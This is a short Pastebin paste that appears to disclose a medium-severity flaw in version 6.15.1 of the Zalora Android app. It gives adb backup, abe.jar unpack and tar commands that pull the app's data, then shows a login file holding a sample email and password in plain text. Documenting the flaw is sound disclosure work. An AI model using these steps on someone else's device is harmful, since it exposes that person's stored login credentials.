Advertisement
Guest User

Zalora

a guest
Apr 21st, 2019
2,488
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.87 KB | None
  1. #Application: Zalora
  2. #Platform: Android
  3. #Version: 6.15.1 (latest)
  4. #Severity: Medium
  5. #Impact: None-root user can read the password in clear-text and login to the application.
  6.  
  7. POC:
  8.  
  9. 1. Backups application data into Local PC
  10. adb backup -f ~/zalora.ab -noapk com.zalora.android
  11.  
  12. 2. Converts file "zalora.ab" into tar file(file contains backup data of com.zalora.android)
  13. java -jar abe.jar unpack ~/zalora.ab zalora.tar ""
  14.  
  15. 3. Extracts tar file.
  16. tar -xvf zalora.tar
  17.  
  18. 4. After the extraction, goes and checks the data in the directory located in apps/com.zalora.android/
  19.  
  20. 5. Looks for sensitive data. The password stored in /shared_prefs/login_data.xml in plain-text
  21.  
  22. <?xml version='1.0' encoding='utf-8' standalone='yes' ?>
  23. <map>
  24. <string name="login_data">{&quot;password&quot;:&quot;P4ssw0rd123&quot;,&quot;email&quot;:&quot;testme@gmail.com&quot;}</string>
  25. </map>
Advertisement
RAW Paste Data Copied
Advertisement